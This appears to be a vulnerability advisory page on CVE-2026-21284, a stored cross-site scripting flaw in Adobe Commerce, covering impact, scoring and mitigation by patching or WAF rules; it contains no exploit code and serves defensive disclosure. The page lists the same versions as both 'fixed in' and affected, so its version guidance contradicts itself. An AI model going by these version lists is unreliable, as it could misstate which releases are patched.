Platform
adobe
Component
adobe-commerce
Fixed in
2.4.5-p15
2.4.6-p13
2.4.7-p8
2.4.8-p3
2.4.9-alpha3
CVE-2026-21284 is a stored Cross-Site Scripting (XSS) vulnerability affecting Adobe Commerce. A high-privileged attacker can inject malicious scripts into vulnerable form fields, potentially leading to session takeover and compromising data integrity. This vulnerability impacts versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, and 2.4.4-p16 and earlier. Adobe has released a patch to address this issue.
This XSS vulnerability allows an attacker to inject arbitrary JavaScript code into form fields within Adobe Commerce. When a user interacts with a page containing the injected script – for example, by submitting a form or simply viewing the page – the malicious script executes within their browser context. This can lead to a variety of attacks, including session hijacking, where the attacker gains control of the user's account. The attacker could also steal sensitive data, deface the website, or redirect users to malicious sites. The high privilege requirement suggests that the vulnerability might be exploitable by administrators or users with elevated permissions within the Adobe Commerce environment, significantly expanding the potential impact.
CVE-2026-21284 was publicly disclosed on March 11, 2026. There is no indication of active exploitation at this time, and it is not currently listed on the CISA KEV catalog. Public proof-of-concept (POC) code is not yet available, but the vulnerability's nature makes it likely that such code will emerge. The CVSS score of 8.1 (HIGH) indicates a significant potential for exploitation if left unaddressed.
Exploit Status
EPSS
0.10% (28% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-21284 is to upgrade Adobe Commerce to a version that includes the security patch. Adobe recommends upgrading to the latest available version. If immediate upgrading is not possible, consider implementing a Web Application Firewall (WAF) with rules to detect and block XSS attempts targeting the vulnerable form fields. Input validation and output encoding on the server-side can also help reduce the attack surface. Thoroughly review and sanitize all user-supplied input before rendering it in web pages.
Update Adobe Commerce to the latest available version. Refer to the Adobe security bulletin for more details and specific upgrade instructions.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-21284 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce versions 2.4.9-alpha3 and earlier, allowing attackers to inject malicious scripts into form fields.
You are affected if you are using Adobe Commerce versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, or 2.4.4-p16 and earlier.
Upgrade Adobe Commerce to a patched version. Implement WAF rules or input validation as a temporary workaround if immediate patching isn't possible.
There is currently no indication of active exploitation, but the vulnerability's nature makes it a potential target.
Refer to the official Adobe Security Bulletin for details: [https://www.adobe.com/security/bulletins/adobe-commerce.html](https://www.adobe.com/security/bulletins/adobe-commerce.html)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.